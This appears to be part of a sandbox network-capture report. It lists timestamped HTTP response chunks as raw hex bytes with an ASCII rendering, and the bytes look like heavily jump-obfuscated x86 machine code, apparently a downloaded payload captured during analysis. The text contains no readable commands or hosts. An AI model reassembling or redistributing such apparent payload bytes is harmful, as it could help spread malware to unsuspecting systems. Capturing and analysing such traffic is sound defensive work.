                                                                              2022-06-01 23:53:42 UTC229INData Raw: 11 f0 d3 9a 27 6f 1d 88 5a 25 c4 8a 66 ea e9 ba f6 ff ff 79 74 ec 71 d2 fa da e9 89 00 00 00 7d ec 23 4b 10 7f b9 0b 2d db 0d d7 d2 eb 44 86 29 e8 4f e7 45 9c 1e af a7 0f 15 dc 54 82 bc 0b c4 e5 95 69 22 e7 3f ee 28 2a fe ab 70 5b e9 6a fe ff ff 42 73 77 ae 02 f8 83 b5 31 d4 ea f8 ab 06 89 aa 46 df 74 c7 e9 bc fe ff ff 18 ea 11 18 76 2c e3 e9 38 f7 ff ff 0d 2d 61 f3 2c 07 c5 70 f5 fd 57 e9 96 f9 ff ff 99 ed 13 7e 61 1b a7 74 54 61 89 e9 f9 f6 ff ff 51 06 35 e4 6c 57 a8 1c c5 da 53 12 bb 0c ae 4f 8f e9 9a f2 ff ff 36 1e 04 62 4c 0f 3f 42 0f 65 a7 3c b3 3b 76 6c e9 6c f6 ff ff d6 d3 65 28 fa 78 b4 72 5b 3b d8 b0 fa 49 df 9d 0b 68 6e a9 3d ab c3 fe c8 e9 a1 f9 ff ff 6d d9 e1 04 d0 e6 c2 94 7b 21 67 62 8b f2 e9 6c f7 ff ff 94 76 1d b2 80 1b 46 4c 3c 95 d4 8b
                                                                              Data Ascii: 'oZ%fytq}#K-D)OETi"?(*p[jBsw1Ftv,8-a,pW~atTaQ5lWSO6bL?Be<;vlle(xr[;Ihn=m{!gblvFL<
                                                                              2022-06-01 23:53:42 UTC230INData Raw: 31 ab c4 bd 00 d2 c5 4f ec 44 e9 82 fe ff ff 2d d0 b8 8b 31 9c d8 0c a5 9b a2 d1 7d d8 df e9 f5 f3 ff ff 34 4f 35 6c d8 a3 b9 58 a1 e9 9a 05 4b 5d 4d b4 20 68 88 d6 39 c2 fd e9 89 fb ff ff 3d 7e 93 c9 8b 0f 0a dd 4b 68 62 f3 e4 53 e9 66 fa ff ff e4 41 12 68 56 43 69 ed 04 19 0d 64 63 70 1b 27 bb e9 27 f7 ff ff 51 7e 5b ef 5c 58 ee 8b 45 f8 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 51 e9 ff 0e 00 00 e9 10 08 00 00 bf 8a 3e 54 c4 38 99 09 59 01 ce 4c 3c 86 24 40 c7 90 b1 e9 80 0b 00 00 2a 82 78 8e 08 e9 85 0e 00 00 60 7f 99 40 9e 08 25 70 d5 78 0f 11 bf a5 9d 5c bc 80 ed b9 f3 66 e9 36 06 00 00 59 56 4f 78 2d 0d a8 4c 6b f0 89 af df 22 c6 2f 0d 66 4e 4d e2 8f 72 44 6c 87 74 96 ab 27 95 c7 6f e9 bc 09 00 00 f4 5c 9f fa 9b d9 ec c0 51 84 cf e3 5a d8 f4 42
                                                                              Data Ascii: 1OD-1}4O5lXK]M h9=~KhbSfAhVCidcp''Q~[\XE]UQ>T8YL<$@*x`@%px\f6YVOx-Lk"/fNMrDlt'o\QZB
                                                                              2022-06-01 23:53:42 UTC232INData Raw: 00 00 17 cd ea 42 ed 11 88 79 3b 7b d6 b7 b7 8a ae 47 06 92 24 e9 0b fd ff ff f7 d9 1a be 86 a7 c3 4a c0 e9 c2 00 00 00 6f cc 09 7e 25 99 b8 0c 51 e8 f0 84 e9 76 06 00 00 07 82 bb d1 7a 59 67 f3 f0 a9 de 57 b2 32 66 76 c8 02 fa 68 c7 e9 ad 05 00 00 91 59 2b 02 5e 17 18 ca c3 f9 c0 c4 8d 69 48 bd d0 c4 e9 69 06 00 00 0d e0 b9 b8 92 f1 c3 67 40 6c f8 5d 61 2d f1 68 c6 b6 19 07 e9 59 02 00 00 ae e2 6f 8b 57 31 16 b0 55 e9 e9 0a 00 00 e9 be 80 67 ed b3 75 e0 61 15 31 c5 e1 79 2a e9 ac 00 00 00 c2 04 6f da 56 e9 a5 0b 00 00 9c a2 ba 34 4f 40 d0 d5 3c a6 0d 13 71 3e 5a 18 e9 04 f6 7b 7c e9 23 0a 00 00 a7 54 d8 ca 18 50 b4 b2 49 c1 c9 81 ea 7c 12 25 f7 6b 1c 64 8e fe e9 ae fd ff ff a7 00 e1 c6 58 92 e9 79 fe ff ff 46 1c 8b 89 44 ec 29 54 2c 15 8a f3 e6 9b 7f 46
                                                                              Data Ascii: By;{G$Jo~%QvzYgW2fvhY+^iHig@l]a-hYoW1Ugua1y*oV4O@<q>Z{|#TPI|%kdXyFD)T,F
                                                                              2022-06-01 23:53:42 UTC233INData Raw: e9 9c f8 ff ff e0 cc 10 dc 80 e0 5e 71 f3 89 ed bf 42 2f c1 d2 25 0d b2 e9 f4 06 00 00 bc 8f dc 58 7f f6 ab 17 79 f5 e3 b3 2e a9 20 90 db cc 5e e1 e9 32 fd ff ff 3a a3 41 e2 b9 c4 52 ed 0f 1c 8d 55 1c b2 23 89 ec a9 e9 44 01 00 00 b5 99 bb 95 1f 35 ae a5 e3 69 b0 0d 5c 94 e9 a0 05 00 00 cd 19 34 5c 5d 69 27 a9 a7 d5 72 e9 47 04 00 00 40 5e dd 69 d1 3f 10 0d f5 43 8b 99 b0 f5 76 26 e9 48 f6 ff ff f9 0b 50 5c fe 34 ab 61 f8 98 81 40 d4 7b b5 12 25 16 02 a4 e5 8b 65 04 93 e9 14 f6 ff ff de e9 08 df f9 e9 e8 fd ff ff 3d 84 c1 82 97 3a 47 65 c4 51 9a dc d6 46 e9 bc fb ff ff 21 aa b8 e7 95 e2 74 2a bf 55 bd ca 50 a0 51 85 75 76 8f e9 00 06 00 00 97 f6 53 6b 1a 8e 98 6a 06 03 27 20 9c 09 00 e9 ce 06 00 00 14 13 25 ea 38 6a 15 e0 e7 e9 27 03 00 00 70 8b 66 5c 92
                                                                              Data Ascii: ^qB/%Xy. ^2:ARU#D5i\4\]i'rG@^i?Cv&HP\4a@{%e=:GeQF!t*UPQuvSkj' %8j'pf\
                                                                              2022-06-01 23:53:42 UTC234INData Raw: 76 b5 e9 7a 02 00 00 dc 69 d8 1c 73 4a d8 b5 14 3f c4 be 4a a2 42 33 e9 5b f2 ff ff 85 26 fc 12 0e 0d 88 9b bc 82 4c 52 e9 74 f5 ff ff c6 80 f3 15 61 a8 a1 39 b1 24 97 b0 e9 e2 f8 ff ff 85 b0 ab be a0 58 26 eb f8 44 b8 4a 48 e4 5c 05 79 6e 64 b4 e9 00 df 8b 37 9e 6c e9 12 ff ff ff 69 66 12 90 aa 79 2e 0d 3a da e9 53 f7 ff ff 1a 68 0e f5 57 71 c2 e9 2d 01 00 00 fc a2 59 55 65 5c 2a 64 91 e9 79 fd ff ff 4e fd 03 99 53 08 6b 7b bc 76 86 ba eb ed b0 ca f1 de d0 ac e7 a7 a1 e9 b3 f3 ff ff 5d f0 ae a6 1a 69 28 69 63 9d 80 58 f0 96 2e ed c2 a4 bf e9 0b fb ff ff ea e8 fa 2b 03 4c ef e9 7c f6 ff ff 68 78 57 f8 2a 6f c5 56 e9 16 fc ff ff 53 b1 97 5c c4 93 e1 fd 21 70 68 3c 79 77 e2 2b 6d ef 51 d0 1b e9 e1 01 00 00 95 7b c2 a1 f1 30 9b bf d8 d0 5f e7 27 be 93 a0 43
                                                                              Data Ascii: vzisJ?JB3[&LRta9$X&DJH\ynd7lify.:ShWq-YUe\*dyNSk{v]i(icX.+L|hxW*oVS\!ph<yw+mQ{0_'C
                                                                              2022-06-01 23:53:42 UTC236INData Raw: e9 13 08 00 00 a6 00 ee 92 c7 8c 47 08 24 b3 d3 46 90 48 6c 66 fa 5b 96 2b 15 ba 25 b9 34 eb 10 38 6a c6 4a f0 3b db db c5 a6 f1 4b 9d da 03 0f e9 c8 01 00 00 a2 dd f4 bd 40 42 73 04 9f dd f0 d7 d2 a1 b9 ad e9 1c 01 00 00 74 39 5c c5 e2 26 bd 45 45 4e 94 4b 57 06 f5 51 2c fe ca 43 e9 0f 03 00 00 a3 a4 7c c4 f0 8b e4 19 e2 9e d3 51 99 fc 9f e9 4b 03 00 00 1e 18 4d a3 a7 94 e9 61 02 00 00 c5 46 e5 e7 a4 43 bc 17 17 bc 79 32 93 45 c9 89 ec 98 94 43 23 79 d4 90 8c 90 d7 e9 16 0a 00 00 58 7a 1a a8 ad 04 88 a9 e9 6f ff ff ff 57 c1 f3 f6 3a b1 65 66 90 72 19 73 76 03 79 e9 3e 07 00 00 e2 3a 01 7b 99 51 8d 4b e9 f5 6a f0 2d 47 28 26 33 ce 2b 64 14 d7 c6 e5 2b 18 e9 35 0a 00 00 0f aa fd 9f ca 3d 76 5f e7 53 85 8e 5a e2 c4 a4 f2 23 23 2c c3 48 9a 50 85 42 c4 fc e9
                                                                              Data Ascii: G$FHlf[+%48jJ;K@Bst9\&EENKWQ,C|QKMaFCy2EC#yXzoW:efrsvy>:{QKj-G(&3+d+5=v_SZ##,HPB
                                                                              2022-06-01 23:53:42 UTC237INData Raw: ff 32 cf 45 01 2e 89 ae 60 5e d9 67 52 b1 13 19 af 60 4c 80 54 7d 3a a0 8f 15 25 e9 0d 04 00 00 d0 85 5c ec 5a d5 dd 7b a8 68 01 f0 dd ea 6a b3 8d 8e c6 23 67 22 eb a9 f2 4e 1f 95 26 10 14 8a 23 ca a2 f6 36 c2 35 c0 da e9 3a f9 ff ff 0f b4 23 75 22 47 f0 5b 12 67 00 65 5e e9 91 e9 46 01 00 00 21 09 3a e1 8e 8a 69 0e 12 50 45 4b 43 d7 7a ef 1f eb 2b aa 1d d3 b0 93 f6 ec d5 ab 53 ac 1e 04 f5 5a b4 5d 63 f4 7b 94 b7 4c ea a3 43 ca 79 c8 1c 39 7c bf e9 28 03 00 00 24 eb f3 d4 10 e9 60 05 00 00 e9 aa 87 f8 e7 4e 20 9b 44 e9 5d fa ff ff 60 0a c5 b7 4f f5 68 20 50 de 7e 9f 21 78 d1 86 86 a2 df e4 cf a9 f1 e4 00 e9 11 fc ff ff a9 13 03 af ee eb f6 65 76 2c 1e 34 fa 50 eb ef bd e9 15 fa ff ff 2b 51 de b9 73 da 06 74 3f f8 fb e5 4f 49 fd 20 e9 3a 25 4d 64 c0 20 e9
                                                                              Data Ascii: 2E.`^gR`LT}:%\Z{hj#g"N&#65:#u"G[ge^F!:iPEKCz+SZ]c{LCy9|($`N D]`Oh P~!xev,4P+Qst?OI :%Md
                                                                              2022-06-01 23:53:42 UTC238INData Raw: 3d 02 27 02 c0 ed 3e 83 55 b9 15 86 72 e9 74 01 c0 b1 4b 7f 01 0c 65 a5 be e9 d7 00 00 00 66 6b 89 a3 e9 2a fa ff ff ce 36 21 b6 a3 1e f1 2b a5 f7 49 ba f4 d5 d5 18 d8 7d 91 9f e9 c8 22 e9 d6 f6 ff ff 99 25 96 36 52 02 87 61 7b 76 a9 b2 dd a2 98 0b e9 c9 fd ff ff 25 15 43 fb 5a aa 77 19 90 b8 75 a9 6a e9 00 fb ff ff 08 54 c1 6b fe 6f 74 f7 c3 e9 80 fb ff ff 65 89 07 51 6c 91 44 10 52 e9 93 f5 ff ff e8 0c 1a 20 43 7c e5 3f 62 f0 38 89 08 c1 f9 86 48 1e 59 6e e9 fb f9 ff ff 51 34 dc 04 e9 0b fb ff ff ad 61 52 14 ad 7a 1a a9 33 64 44 e9 0f f9 ff ff cf e6 55 2a bd 5a 11 8e a5 4c c1 f0 2d 17 fd 50 a1 90 6b e9 85 f5 ff ff fc eb cd 29 93 c8 3a 60 2a af ca 7f 1e 00 e9 8f f8 ff ff b2 78 b9 26 e8 77 e9 ff f8 ff ff 83 34 15 41 66 bb f2 e9 69 f3 ff ff 29 f6 15 e0 4f
                                                                              Data Ascii: ='>UrtKefk*6!+I}"%6Ra{v%CZwujTkoteQlDR C|?b8HYnQ4aRz3dDU*ZL-Pk):`*x&w4Afi)O
                                                                              2022-06-01 23:53:42 UTC240INData Raw: e4 e9 e8 04 00 00 23 75 41 7c 6f 24 f0 e5 86 d2 86 1c 1d 77 7f e5 e9 bc 05 00 00 a8 f1 84 88 dc 46 42 32 a1 69 1c d5 a1 a8 e4 99 0b 47 f3 02 e9 2e 07 00 00 79 5d 38 23 c6 f0 07 20 c6 e8 d8 be cc 1c e9 7c 4f a1 78 68 84 1e a8 03 26 2d 18 70 e8 e9 45 07 00 00 a9 f5 ea 0f 3e 41 71 29 e9 35 01 00 00 71 ac 8a 06 ad c8 57 f5 4b 01 0f de cf 32 6c b0 7a e9 17 ff ff ff 69 37 fc 0e 1a 64 6f bf c5 7e 3d 13 e9 cf fd ff ff 8e de 94 4c 3e 16 a0 e9 12 05 00 00 01 c3 6b c1 ac ea fb 3a 47 58 cd 49 6b e9 f8 fc ff ff 31 a9 25 df 47 bf e5 86 5d 14 b3 e9 20 fd ff ff ce 48 cf ac e6 4e da e9 06 ff ff ff c5 1b f1 87 71 47 ea 56 da fa 35 8d e9 6e 02 00 00 9a d7 96 ab da 72 6f d4 39 f4 d4 62 8a 63 28 e8 e9 a8 fc ff ff b7 50 60 64 cc f7 92 1a 93 05 87 d8 47 23 cb e9 df 00 00 00 f8
                                                                              Data Ascii: #uA|o$wFB2iG.y]8# |Oxh&-pE>Aq)5qWK2lzi7do~=L>k:GXIk1%G] HNqGV5nro9bc(P`dG#
                                                                              2022-06-01 23:53:42 UTC241INData Raw: c5 c4 eb 0a f5 fd 4c e9 b9 fe ff ff 73 02 30 54 d5 ca f7 c1 e9 1f f9 ff ff 28 32 ba 26 f9 d5 23 4a f7 49 53 e9 01 fe ff ff 71 ee 20 11 33 43 2b a4 91 11 a5 22 d5 56 34 62 1d c0 ca 06 e7 a1 de 1f 53 eb 04 c8 d4 f2 3c e9 92 fa ff ff 57 32 73 0f 1b ec d5 4d da d2 60 ab e9 53 02 00 00 99 47 cc 8e 65 d5 e6 01 ad 8b 5d 91 c6 e9 64 fd ff ff 68 3e 66 fa b8 76 bd 23 a6 7c d5 ec 85 bb a5 bf b4 26 e9 94 f9 ff ff 11 4a 11 24 8b e6 82 10 23 97 8b 46 98 27 e9 16 f8 ff ff 99 37 49 07 08 88 7b 51 27 a6 e8 bb d5 9f d5 dc e9 50 01 00 00 f2 07 26 55 17 76 6f 76 9e 10 57 09 e9 21 ff ff ff 3c f3 5b e6 ab 08 25 eb 74 50 d0 45 66 29 36 cb c4 e7 05 89 2a 64 a6 88 a9 6e 2f 88 c4 d5 e9 8d fc ff ff a9 d2 c7 ed 4d 17 ee 16 e9 d6 fc ff ff d6 00 89 72 6f 0f 37 13 96 95 72 dc 4d 59 c7
                                                                              Data Ascii: Ls0T(2&#JISq 3C+"V4bS<W2sM`SGe]dh>fv#|&J$#F'7I{Q'P&UvovW!<[%tPEf)6*dn/Mro7rMY
                                                                              2022-06-01 23:53:42 UTC242INData Raw: 02 00 00 79 b7 6a fa d2 e0 de 88 e9 31 ff ff ff a4 0d cb 6c 2f 49 22 3b e9 51 91 15 b8 43 4e 83 82 a1 05 ac 4b e9 09 01 00 00 25 6e c1 e3 d5 40 8d 78 d0 d7 93 24 a6 ca e9 d7 fe ff ff 8d 77 d9 e1 49 ed a5 ec 49 d0 a4 78 72 ef ce e9 7d 03 00 00 da 87 c8 b8 ad 8d e8 3c 86 5d 33 85 b1 04 e9 09 01 00 00 fe 7a 06 97 65 79 5f f5 54 88 b9 55 ac e0 bf d3 b3 ae 12 e1 a3 21 e9 49 fe ff ff cc d5 af 65 ce 95 09 be 4b ce b5 de b4 eb 2f ac 91 48 8d 73 bb 38 48 07 41 e9 6f 02 00 00 23 57 51 2c f3 d9 50 c7 8e bb b2 26 4c e0 f5 5a fb 88 e9 d6 01 00 00 77 80 ec a7 65 b5 a7 cb 8b e9 7e fd ff ff 7d 24 df fa 08 ad 2f 02 55 1a ca ad ae ed 5e eb 53 8e 53 a0 f0 9e b7 86 a5 76 71 0d 19 0c d0 bd 7a e9 6c 01 00 00 7d 8f 1a 78 67 34 c1 28 fa a0 17 8f 15 eb 43 24 79 08 16 5b f7 a5 e9
                                                                              Data Ascii: yj1l/I";QCNK%n@x$wIIxr}<]3zey_TU!IeK/Hs8HAo#WQ,P&LZwe~}$/U^SSvqzl}xg4(C$y[
                                                                              2022-06-01 23:53:42 UTC243INData Raw: 03 fd 26 27 6e 20 8f 80 89 a4 2e 79 5c 43 7f 1e 3d a1 39 6d 4a bf b3 31 89 e9 e5 fe ff ff 99 5d d3 dd 62 70 d2 62 c1 e3 dc 24 ee fe 2b 06 72 84 df cd 5b 0b d9 eb 50 6e a5 e1 e9 4f 02 00 00 e4 64 71 cf 44 f7 8c 9c 50 ae cc 5a 24 d4 4e 0f 5f e9 81 06 00 00 6d 87 d8 33 5c bf 59 02 16 bb 46 e2 56 ac bc fe 7a e9 80 fe ff ff 4c 61 2d 08 8c 56 50 32 c5 1d 10 a1 5a 5d 34 06 59 b4 b4 8d 3e 56 fe e9 79 01 00 00 88 2f 15 4c c6 cd 9f 30 96 0d ac a5 68 e9 18 ff ff ff 74 2f 93 31 4c e9 4b 02 00 00 ef 0d ec e5 ec 0d be f0 ae e4 cf e9 a8 03 00 00 d6 97 3a 6e e2 da 22 28 3f 88 a3 1a fa 75 e2 18 ef 35 e9 08 05 00 00 5f bb b6 d2 b6 cc 47 8e d7 6f 27 e9 07 05 00 00 ad 82 a9 7c dd 54 b1 a8 3d 8b d1 fa c2 a4 e9 bf 02 00 00 c5 2d 12 92 ae f4 fd 75 c4 79 0a 0a c5 05 e6 20 64 17
                                                                              Data Ascii: &'n .y\C=9mJ1]bpb$+r[PnOdqDPZ$N_m3\YFVzLa-VP2Z]4Y>Vy/L0ht/1LK:n"(?u5_Go'|T=-uy d
                                                                              2022-06-01 23:53:42 UTC245INData Raw: 92 93 4c 11 e9 54 fd ff ff 71 0f 7f 5e bd 54 01 71 62 8f 3b d2 e9 f4 fe ff ff 5a 14 d3 58 03 c2 49 c3 97 10 0c bb d4 d3 9a b8 fa 25 e9 32 fb ff ff 03 8a f1 2d 82 42 87 ca 5e c8 f1 e9 d6 9b cb 61 be 93 e9 ea fa ff ff b7 93 72 d0 b3 c1 32 42 9c 97 4b a7 3f 9c 06 e9 a6 f9 ff ff 10 3e 89 d8 17 ab 37 fd 48 df 50 03 93 32 90 1a a7 b1 f3 b8 e9 f0 fe ff ff d9 e5 02 87 48 96 e8 14 04 18 e9 2a fb ff ff ec fd 7a 27 a4 65 5e 7b 99 00 0d 60 65 a4 63 e2 23 eb e9 53 01 00 00 7e 6d 69 01 6c 17 a5 80 57 a4 e9 ff fd ff ff b9 5d 73 6f 95 89 35 0a 4a a3 51 33 04 84 87 bc 1c c3 0f f4 90 d5 8d 6f 76 0d 01 29 89 84 2f e9 bf fd ff ff c9 42 c9 40 74 b3 e5 cd c9 34 02 e4 7a 03 3e 3e 81 0b 4a a5 36 e9 48 01 00 00 29 d1 9d cf 67 23 0c fc 87 00 22 f4 b8 e9 57 fe ff ff b3 a7 b3 25 f7
                                                                              Data Ascii: LTq^Tqb;ZXI%2-B^ar2BK?>7HP2H*z'e^{`ec#S~milW]so5JQ3ov)/B@t4z>>J6H)g#"W%
                                                                              2022-06-01 23:53:42 UTC246INData Raw: 45 49 c6 bb f3 10 75 21 e5 3b e9 fb 09 00 00 8d 03 32 35 15 2c 45 c8 a4 4f 04 3f fc e9 e7 06 00 00 00 ad 9d eb cf 6c ae 33 4c fd 12 b0 f8 46 11 2b 2e 35 67 8e e9 43 06 00 00 d1 82 4a 44 9d f3 d3 a7 6b b1 74 39 13 df 09 aa f6 3f 2e e9 8b 0a 00 00 4b a6 a2 5a c1 53 4e 74 2c 67 e3 f3 26 9e e9 fb 05 00 00 cc a6 a3 8f 32 e2 0b c1 7a 78 f1 9f e4 8b e9 be 04 00 00 4c 97 5c 45 98 75 16 29 6b 9f 10 ea 82 e9 22 07 00 00 a7 7c d9 ec 3a 63 29 08 b1 e9 fc 05 00 00 db 76 79 ea ce 70 d0 3b cb ce 61 13 37 e9 5f 05 00 00 76 07 38 e3 9e 9d e9 0b fe ff ff ed 1d c9 92 ed 3c e2 3d 06 09 c6 27 d7 4d 24 6b 19 ac 0b 24 74 87 ca eb e2 ba 7a a9 90 78 56 91 a5 51 0e fc 81 37 ac f9 51 d3 91 a8 e9 f1 04 00 00 98 c2 3c 63 ce 93 60 56 00 d1 46 93 8c 5a ad 5f 4d 74 3a 45 d2 dc 65 f0 7d
                                                                              Data Ascii: EIu!;25,EO?l3LF+.5gCJDkt9?.KZSNt,g&2zxL\Eu)k"|:c)vyp;a7_v8<='M$k$tzxVQ7Q<c`VFZ_Mt:Ee}
                                                                              2022-06-01 23:53:42 UTC248INData Raw: e1 0e e9 e9 12 f9 ff ff 83 56 3e 26 8a 18 8d 9c d7 09 5d ca f1 78 21 5b 6e ce 98 33 97 8b e9 c9 fc ff ff eb 98 cf ce 68 51 e9 ed fc ff ff af 54 9a 72 f5 5b 45 46 13 a4 b4 eb af df 51 8b 05 7d ad ba b5 c3 42 7f 62 2c 3e 5a 43 a9 73 48 e5 f0 dd e9 65 ff ff ff e9 8e 18 24 10 a2 c6 03 af cf 79 61 d5 e9 41 06 00 00 b2 03 5e f2 fc f8 cb c1 ba 43 db 2d 43 e9 83 fb ff ff 1d 28 86 58 e0 a6 61 1c e9 fb f8 ff ff b5 04 b6 a6 91 aa 63 b2 89 cc be 36 ad 8b e9 6c fc ff ff e0 bf 59 41 59 98 23 80 9f 49 f2 fd 30 e9 01 02 00 00 ca a8 4f 3f dc f2 37 47 6e 52 7c c4 e9 ba 01 00 00 41 98 ae ab 46 76 8e ed 44 c1 73 82 a7 1b 78 15 9a 0d a6 2d 47 f0 cf de 64 38 eb a9 61 2f eb 1f cd 7f aa 1b 7a 9d 47 ae 87 29 2f c0 03 38 dd b9 0e e9 c3 05 00 00 f8 99 68 af 7b 9b fb 0e 10 6f 55 e9
                                                                              Data Ascii: V>&]x![n3hQTr[EFQ}Bb,>ZCsHe$yaA^C-C(Xac6lYAY#I0O?7GnR|AFvDsx-Gd8a/zG)/8h{oU
                                                                              2022-06-01 23:53:42 UTC249INData Raw: ff ff bd ae 15 36 26 a1 8c 57 eb 5c f3 41 4a 2f cf 46 79 f6 54 6f 51 c1 20 e9 3f 01 00 00 d4 15 a3 5b ba 94 e8 9b b7 27 52 00 c3 4c 69 f4 4a 59 ba e9 f2 f7 ff ff 79 71 a6 26 33 45 5b 52 2a db bc a6 f6 46 eb bf 95 ac e0 58 9d 19 23 99 f7 2e de e3 76 43 78 99 e9 b8 fe ff ff bc 0d c1 bb 62 5c a7 3d ef 63 d3 ba ce e9 ed f6 ff ff 2b 00 c5 09 45 0a f5 57 32 5b db e9 5e fe ff ff 87 36 21 b8 7b 45 18 08 74 51 a4 f8 83 2d e1 4a 25 77 8f e6 8b 8e b0 3f e9 4f f9 ff ff f0 2f 0c a1 c8 a4 30 08 d4 46 36 e9 60 f7 ff ff b6 6c 56 ba 3c 5e 8b e4 cb fd 65 6e 26 2e 77 2f e9 78 9f 4a 0d 68 d0 7c ef 79 e9 38 f4 ff ff 40 75 11 d0 df 43 6c e9 60 fd ff ff a0 78 8a b7 d7 89 09 ea 7e b9 50 e9 f0 f6 ff ff 8e 79 2d 24 64 5a 98 f7 a1 a2 ee 3e 53 03 c8 5b 9e e8 11 8a b3 24 ae 51 86 18
                                                                              Data Ascii: 6&W\AJ/FyToQ ?['RLiJYyq&3E[R*FX#.vCxb\=c+EW2[^6!{EtQ-J%w?O/0F6`lV<^en&.w/xJh|y8@uCl`x~Py-$dZ>S[$Q
                                                                              2022-06-01 23:53:42 UTC250INData Raw: 94 00 00 00 93 26 7c 67 21 53 0d c4 e9 8d fd ff ff 12 f6 dd e3 a9 30 3f 09 e9 fc 00 00 00 89 02 03 80 f5 f5 ea b5 6c 33 e9 cb 03 00 00 b5 41 d1 36 e0 49 92 8e e9 ab 01 00 00 0f 75 e6 ed be 7a d2 d5 f3 96 3c 8b 7d e9 e5 01 00 00 ab 57 27 5a d4 31 17 41 bd 12 e9 50 fe ff ff 73 9d f6 d4 d0 d4 4d 10 93 d2 35 e9 47 ff ff ff c2 7e f9 cd 6b e9 24 08 00 00 37 b8 2f 84 03 5b c9 30 29 3e 1b 32 af dc c1 e9 16 fc ff ff 69 64 0f 23 dd c0 fe 09 5b 6f 25 6f c4 dd b5 e9 c8 fd ff ff b1 c9 31 06 fe e9 f5 08 00 00 5f 5a 32 a6 81 51 77 5a 44 ce 6d 47 e9 ca 08 00 00 34 d6 54 70 e0 cb 4e 68 f1 99 a1 b4 ce e0 a1 99 4b fc cf 2c df 95 8e e9 73 06 00 00 a3 4a 2f ae e1 01 92 41 0b 6f d4 69 7c 32 e0 45 aa 3d 56 69 9b eb 75 3f f4 9f c3 3c fb 04 02 c5 2f 25 b9 c6 77 af c0 b4 29 87 91
                                                                              Data Ascii: &|g!S0?l3A6Iuz<}W'Z1APsM5G~k$7/[0)>2id#[o%o1_Z2QwZDmG4TpNhK,sJ/Aoi|2E=Viu?</%w)
                                                                              2022-06-01 23:53:42 UTC252INData Raw: 63 f9 55 b7 46 e5 40 d9 fe 39 90 d0 72 cc 71 e9 9e fd ff ff b3 fd 69 70 27 cc dd e9 3b fd ff ff 7d b1 1f 19 43 e9 30 03 00 00 55 95 ea 15 31 41 6f 8e 12 c3 f1 46 56 e6 e9 29 f9 ff ff 9a b9 9d 9f af ce f9 f4 e7 13 be e9 aa 03 00 00 7e d7 89 20 16 e9 dc 00 00 00 96 86 d1 ed 61 f4 f7 51 e9 a0 fa ff ff d7 80 92 3a c5 16 e9 30 fb ff ff 7f 55 3f b3 6f a1 a4 89 df 37 b2 43 3d e9 de 01 00 00 4c 0b d7 d1 3d ae 88 f0 d3 cf 02 9e b6 b8 85 d2 e9 40 02 00 00 2c 24 93 8b 1d 30 6a f9 91 a3 14 9a 25 f8 f4 c8 a3 5b cc e9 89 fe ff ff 14 1a 64 b4 2f 1a 05 9d 92 6a de 2d 35 bf 1f 0f 8d 8e f9 36 70 c8 d9 c2 05 e9 1d f9 ff ff 1d c4 44 3d e0 28 db 26 d5 74 dc 1f 76 e9 36 f7 ff ff 03 be 86 89 91 cc 11 06 9c 3b ee 8b a1 f5 86 f6 3d 39 22 a0 52 94 09 63 d5 81 3b e9 2f f7 ff ff 4f
                                                                              Data Ascii: cUF@9rqip';}C0U1AoFV)~ aQ:0U?o7C=L=@,$0j%[d/j-56pD=(&tv6;=9"Rc;/O
                                                                              2022-06-01 23:53:42 UTC253INData Raw: 83 bd 60 ff ff ff 00 75 05 e9 6a ff ff ff 8b 85 60 ff ff ff 8b 8d 60 ff ff ff 8b 54 85 ec 2b 54 8d ec 8b 85 60 ff ff ff 89 54 85 ec e9 47 ff ff ff dd 05 48 36 40 00 dd 9d 68 ff ff ff dd 05 40 36 40 00 dd 9d 70 ff ff ff dd 05 38 36 40 00 dd 9d 78 ff ff ff dd 05 30 36 40 00 dd 5d 80 dd 05 28 36 40 00 dd 5d 88 dd 05 20 36 40 00 dd 5d 90 dd 05 18 36 40 00 dd 5d 98 dd 05 10 36 40 00 dd 5d a0 dd 05 08 36 40 00 dd 5d a8 c7 85 5c ff ff ff 00 00 00 00 eb 0f 8b 8d 5c ff ff ff 83 c1 01 89 8d 5c ff ff ff 83 bd 5c ff ff ff 09 0f 8d 22 01 00 00 8b 95 5c ff ff ff 81 e2 01 00 00 80 79 05 4a 83 ca fe 42 85 d2 75 22 db 85 5c ff ff ff 8b 85 5c ff ff ff dc ac c5 68 ff ff ff 8b 8d 5c ff ff ff dd 9c cd 68 ff ff ff eb 46 8b 95 5c ff ff ff 81 e2 01 00 00 80 79 05 4a 83 ca fe 42
                                                                              Data Ascii: `uj``T+T`TGH6@h@6@p86@x06@](6@] 6@]6@]6@]6@]\\\\"\yJBu"\\h\hF\yJB
                                                                              2022-06-01 23:53:42 UTC254INData Raw: 00 00 50 83 ec 08 a1 50 c0 54 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d ec 51 8b cc 89 65 f0 e8 fd 02 00 00 8b 4d ec e8 25 05 00 00 c7 45 fc 00 00 00 00 6a 00 8b 4d ec e8 e4 03 00 00 c7 45 fc ff ff ff ff 8b 45 ec 8b 4d f4 64 89 0d 00 00 00 00 59 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 31 04 00 00 8b 4d fc e8 a9 00 00 00 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc 8b 4d fc 8b 40 10 2b 41 0c c1 f8 02 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 83 ec 1c 56 89 4d e4 8b 4d e4 e8 ce ff ff ff 8b f0 8b 4d e4 e8 74 02 00 00 3b f0 73 1d 8b 45 08 50 6a 01 8b 4d e4 8b 51 10 52 8b 4d e4 e8 3b 04 00 00 8b 4d e4 89 41 10 eb 2f 8d 55 f0 52 8b 4d e4 e8 87 02 00 00 8b 08 8b 50 04 89 4d f8 89 55 fc 8b 45 08 50 8b 4d fc 51 8b
                                                                              Data Ascii: PPT3PEdMQeM%EjMEEMdY]UQMM1M]UQMEM@+A]UVMMMt;sEPjMQRM;MA/URMPMUEPMQ
